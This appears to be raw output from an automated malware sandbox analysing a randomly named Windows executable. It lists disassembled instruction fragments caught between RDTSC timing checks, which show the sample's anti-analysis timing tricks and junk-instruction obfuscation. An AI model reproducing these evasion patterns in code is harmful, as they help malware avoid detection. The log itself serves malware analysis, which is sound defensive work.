Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 515A65 second address: 515A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FFAEC5291A6h 0x0000000c popad 0x0000000d pushad 0x0000000e jp 00007FFAEC5291A6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007FFAEC5291B0h 0x0000001b jnl 00007FFAEC5291A6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 515A92 second address: 515A9C instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5267DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 515D72 second address: 515D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51A027 second address: 51A039 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FFAEC5267D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51A039 second address: 51A047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FFAEC5291ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51A047 second address: 51A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 519225 second address: 519229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 519229 second address: 51922F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51922F second address: 519256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAEC5291B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 519D15 second address: 519D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 519D1A second address: 519D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 519D20 second address: 519D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51E7B5 second address: 51E7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51E7B9 second address: 51E7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51E7BD second address: 51E7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FFAEC5291A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51E7CC second address: 51E7D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 527196 second address: 5271BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jl 00007FFAEC5291A6h 0x0000000e jmp 00007FFAEC5291B0h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5271BD second address: 527218 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAEC5267D6h 0x00000008 jc 00007FFAEC5267D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FFAEC5267E9h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FFAEC5267E1h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FFAEC5267E8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 popad 0x00000029 jnl 00007FFAEC5267E3h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 525742 second address: 525782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007FFAEC5291AAh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push edx 0x00000014 jg 00007FFAEC5291A6h 0x0000001a jng 00007FFAEC5291A6h 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 js 00007FFAEC5291A6h 0x0000002f popad 0x00000030 jmp 00007FFAEC5291B0h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52590B second address: 525915 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5267DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 525D0F second address: 525D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 525E7F second address: 525E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 525E84 second address: 525EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FFAEC5291A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FFAEC5291B1h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 je 00007FFAEC5291ACh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 526030 second address: 526054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFAEC5267E7h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 526054 second address: 52606B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007FFAEC5291A6h 0x0000000e jo 00007FFAEC5291A6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5268D3 second address: 5268DD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAEC5267D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52DA49 second address: 52DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52DA4D second address: 52DA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFAEC5267E2h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52DA78 second address: 52DA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52D792 second address: 52D797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 52D797 second address: 52D7C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291B7h 0x00000009 jmp 00007FFAEC5291B2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5394B3 second address: 5394CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAEC5267E6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 53BDB2 second address: 53BDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAEC5291A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 53BDBC second address: 53BDEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAEC5267DCh 0x00000008 jng 00007FFAEC5267D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FFAEC5267E2h 0x00000016 jl 00007FFAEC5267D8h 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 54C9ED second address: 54C9F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5538FD second address: 553911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 553911 second address: 55392B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FFAEC5291AFh 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 553D53 second address: 553D62 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5267DAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 553EC4 second address: 553ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFAEC5291A6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 559EBF second address: 559EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55A038 second address: 55A03D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55D60E second address: 55D628 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAEC5267D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 jc 00007FFAEC5267F0h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55D628 second address: 55D640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55D640 second address: 55D646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55D646 second address: 55D64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 55D64A second address: 55D64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 56552C second address: 565531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 569565 second address: 569573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jne 00007FFAEC5267DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 569573 second address: 569582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FFAEC5291A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 569582 second address: 56958B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 57A4D7 second address: 57A4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007FFAEC5291A8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 57A4E6 second address: 57A4EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E612 second address: 58E618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E618 second address: 58E61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E791 second address: 58E797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E797 second address: 58E7A1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5267DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E8F0 second address: 58E8FA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58E8FA second address: 58E900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58EBF8 second address: 58EBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58EBFC second address: 58EC14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FFAEC5267D6h 0x0000000f pushad 0x00000010 popad 0x00000011 jnl 00007FFAEC5267D6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58F072 second address: 58F09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FFAEC5291A6h 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jne 00007FFAEC5291A6h 0x00000012 pop ebx 0x00000013 jc 00007FFAEC5291B1h 0x00000019 jmp 00007FFAEC5291ABh 0x0000001e push ecx 0x0000001f jnl 00007FFAEC5291A6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58F478 second address: 58F489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jc 00007FFAEC5267D6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58F489 second address: 58F49B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAEC5291ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 58F49B second address: 58F49F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59252B second address: 59254D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59254D second address: 592553 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 592553 second address: 59256A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59256A second address: 59256E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59256E second address: 59259F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 js 00007FFAEC5291ACh 0x0000000f and edx, dword ptr [ebp+12450CB9h] 0x00000015 js 00007FFAEC5291ACh 0x0000001b mov edx, dword ptr [ebp+122D3576h] 0x00000021 push 00000004h 0x00000023 mov dl, ch 0x00000025 mov dh, A6h 0x00000027 push C0116502h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59259F second address: 5925A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5925A3 second address: 5925A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5925A7 second address: 5925B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFAEC5267DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5953D3 second address: 5953F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FFAEC5291AEh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 597319 second address: 59731D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 59731D second address: 597326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 597326 second address: 597348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E0h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007FFAEC5267D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 597348 second address: 597362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 597362 second address: 597368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B1AA5 second address: 4B1AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B1AAB second address: 4B1AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FFAEC5267EBh 0x00000010 jmp 00007FFAEC5267E5h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF06C3 second address: 4FF0774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAEC5291B1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007FFAEC5291ACh 0x00000016 pushfd 0x00000017 jmp 00007FFAEC5291B2h 0x0000001c sub eax, 579889F8h 0x00000022 jmp 00007FFAEC5291ABh 0x00000027 popfd 0x00000028 pop esi 0x00000029 pushad 0x0000002a mov bx, 3C1Ah 0x0000002e movsx edx, cx 0x00000031 popad 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 pushad 0x00000036 movzx ecx, di 0x00000039 mov di, 6458h 0x0000003d popad 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FFAEC5291B9h 0x00000048 sub eax, 6E4CAFF6h 0x0000004e jmp 00007FFAEC5291B1h 0x00000053 popfd 0x00000054 pushad 0x00000055 popad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0774 second address: 4FF07CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAEC5267DDh 0x00000008 pop ecx 0x00000009 movsx edx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ecx 0x00000012 pushad 0x00000013 call 00007FFAEC5267E6h 0x00000018 pushfd 0x00000019 jmp 00007FFAEC5267E2h 0x0000001e sub si, 4AA8h 0x00000023 jmp 00007FFAEC5267DBh 0x00000028 popfd 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c mov ecx, edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF07CE second address: 4FF086E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFAEC5291ABh 0x00000008 xor ax, CFEEh 0x0000000d jmp 00007FFAEC5291B9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 jmp 00007FFAEC5291AEh 0x0000001c push eax 0x0000001d jmp 00007FFAEC5291ABh 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FFAEC5291B4h 0x0000002a add si, 31C8h 0x0000002f jmp 00007FFAEC5291ABh 0x00000034 popfd 0x00000035 mov esi, 38012B3Fh 0x0000003a popad 0x0000003b lea eax, dword ptr [ebp-04h] 0x0000003e pushad 0x0000003f mov ecx, 50534337h 0x00000044 jmp 00007FFAEC5291ACh 0x00000049 popad 0x0000004a nop 0x0000004b pushad 0x0000004c push eax 0x0000004d push edi 0x0000004e pop esi 0x0000004f pop edx 0x00000050 mov di, si 0x00000053 popad 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF086E second address: 4FF0872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
